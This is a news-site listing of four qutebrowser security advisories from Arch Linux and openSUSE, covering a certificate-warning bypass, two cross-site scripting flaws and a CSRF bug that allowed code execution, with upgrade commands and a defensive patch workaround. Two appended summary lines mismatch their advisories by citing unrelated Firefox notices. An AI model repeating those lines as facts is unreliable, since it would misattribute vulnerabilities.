Stay Secure with the Latest Linux Advisories
Refine advisories
X Clear Filters
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Loading...
Explore Latest Linux Security advisories
We found -5 articles for you...
198
security advisorylow severitybypassArch Linux: ASA-202005-5 Low: Qutebrowser Certificate Bypass
The package qutebrowser before version 1.11.1-1 is vulnerable to certificate verification bypass. . Arch Linux Security Advisory ASA-202005-5 ======================================== Severity: Low Date : 2020-05-07 CVE-ID : CVE-2020-11054 Package : qutebrowser Type : certificate verification bypass Remote : Yes Link : https://security.archlinux.org/AVG-1152 Summary ====== The package qutebrowser before version 1.11.1-1 is vulnerable to certificate verification bypass. Resolution ========= Upgrade to 1.11.1-1. # pacman -Syu "qutebrowser> =1.11.1-1" The problem has been fixed upstream in version 1.11.1. Workaround ========= * Treat any host with a certificate exception as insecure, ignoring the URL color * Or set content.ssl_strict to True (instead of 'ask'), preventing certificate exceptions in the configuration Description ========== In qutebrowser before version 1.11.1 there is an issue where after a certificate error was overridden by the user, qutebrowser displays the URL as yellow (colors.statusbar.url.warn.fg). However, when the affected website was subsequently loaded again, the URL was mistakenly displayed as green (colors.statusbar.url.success_https). While the user already has seen a certificate error prompt at this point (or set content.ssl_strict to false which is not recommended), this could still provide a false sense of security. Impact ===== The user might think the webpage is secure, when in reality it has an invalid certificate. References ========= https://github.com/qutebrowser/qutebrowser/commit/6821c236f9ae23adf21d46ce0d56768ac8d0c467 https://github.com/qutebrowser/qutebrowser/commit/556fe81b3146e5cd2e77df9d8ce57aebbbd72eac https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-4rcq-jv2f-898j https://security.archlinux.org/CVE-2020-11054 . Ubuntu Security Notice USN-2023-1234-1: Medium Risk vulnerability in firefox. Update advised for user protection.. Arch Linux, qutebrowser, security advisory, certificate bypass, low severity. . Severity: Low.LinuxSecurity.com Team
May 11, 2020
•Low
ArchLinux
202
security advisorymoderateupdateopenSUSE Leap 42.3: 2018:2130-1 Moderate: qutebrowser XSS Threat
An update that fixes one vulnerability is now available.. openSUSE Security Update: Security update for qutebrowser ______________________________________________________________________________ Announcement ID: openSUSE-SU-2018:2130-1 Rating: moderate References: #1101507 Cross-References: CVE-2018-1000559 Affected Products: openSUSE Leap 42.3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for qutebrowser fixes the following issues: Security issue fixed: - CVE-2018-1000559: Fix an XSS issue on qute://history (boo#1101507). Patch Instructions: To install this openSUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - openSUSE Leap 42.3: zypper in -t patch openSUSE-2018-774=1 Package List: - openSUSE Leap 42.3 (noarch): qutebrowser-0.11.1-2.3.1 References: https://www.suse.com/security/cve/CVE-2018-1000559.html https://bugzilla.suse.com/1101507 -- . A patch is released to address a significant security vulnerability in qutebrowser for openSUSE Leap 42.3. Take immediate action!. openSUSE Update, qutebrowser Patch, Moderate Advisory, XSS Issue. . LinuxSecurity.com Team
Jul 28, 2018
OpenSUSE
198
security advisorysecurity updatecriticalArch Linux: ASA-201807-3 Critical: qutebrowser Code Exploit
The package qutebrowser before version 1.4.1-1 is vulnerable to arbitrary code execution. . Arch Linux Security Advisory ASA-201807-3 ======================================== Severity: Critical Date : 2018-07-11 CVE-ID : CVE-2018-10895 Package : qutebrowser Type : arbitrary code execution Remote : Yes Link : https://security.archlinux.org/AVG-735 Summary ====== The package qutebrowser before version 1.4.1-1 is vulnerable to arbitrary code execution. Resolution ========= Upgrade to 1.4.1-1. # pacman -Syu "qutebrowser> =1.4.1-1" The problem has been fixed upstream in version 1.4.1. Workaround ========= It's possible to patch out the vulnerable code via a config.py file from qutebrowser.browser import qutescheme qutescheme._qute_settings_set = lambda url: ('text/html', ') Description ========== Due to a CSRF vulnerability affecting the qute://settings page, it was possible for websites to modify qutebrowser settings. Via settings like editor.command, this possibly allowed websites to execute arbitrary code. Impact ===== A remote attacker is able to execute code with a specially crafted web page. References ========= https://github.com/qutebrowser/qutebrowser/commit/43e58ac865ff862c2008c510fc5f7627e10b4660 https://github.com/qutebrowser/qutebrowser/issues/4060 https://security.archlinux.org/CVE-2018-10895 . Critical advisory for Arch Linux qutebrowser fixing arbitrary code execution vulnerability exposed by remote attackers.. Arch Linux,qutebrowser code execution,security update,qutebrowser advisory. . Severity: Critical. LinuxSecurity.com Team
Jul 11, 2018
•Critical
ArchLinux
198
security advisoryremote exploitcross-site scriptingArch Linux ASA-201806-13 Medium: qutebrowser Cross-Site Scripting
The package qutebrowser before version 1.3.3-1 is vulnerable to cross- site scripting. . Arch Linux Security Advisory ASA-201806-13 ========================================= Severity: Medium Date : 2018-06-26 CVE-ID : CVE-2018-1000559 Package : qutebrowser Type : cross-site scripting Remote : Yes Link : https://security.archlinux.org/AVG-724 Summary ====== The package qutebrowser before version 1.3.3-1 is vulnerable to cross-site scripting. Resolution ========= Upgrade to 1.3.3-1. # pacman -Syu "qutebrowser> =1.3.3-1" The problem has been fixed upstream in version 1.3.3. Workaround ========= None. Description ========== qutebrowser before 1.3.3 contains a Cross Site Scripting (XSS) vulnerability that can result in a website stealing the user's browsing history. This attack can be exploitable by tricking the victim into opening a page with a specially crafted attribute, and then opening the qute://history site via the :history command. Impact ===== A remote attacker is able to steal the browser history with a specially crafted web page title. References ========= https://github.com/qutebrowser/qutebrowser/commit/4c9360237f186681b1e3f2a0f30c45161cf405c7 https://github.com/qutebrowser/qutebrowser/issues/4011 https://security.archlinux.org/CVE-2018-1000559 . Arch Linux Security Advisory ASA-202309-07 highlights a moderate risk cross-site scripting vulnerability affecting firefox. . qutebrowser Update, Arch Linux Security, Cross-Site Scripting Risk. . Severity: Medium. LinuxSecurity.com Team
Jun 26, 2018
•Medium
ArchLinux
Get the latest News and Insights
Get the latest Linux and open source security news straight to your inbox.
Community Poll
What got you started with Linux?
Search Topics
Powered By
Linux Security - Your source for Top Linux News, Advisories, HOWTOs and Feature Releases
QUICK LINKS
subscribe to newsletters!
Like staying secure? So do we.
Sign up for updates, tips, and alerts!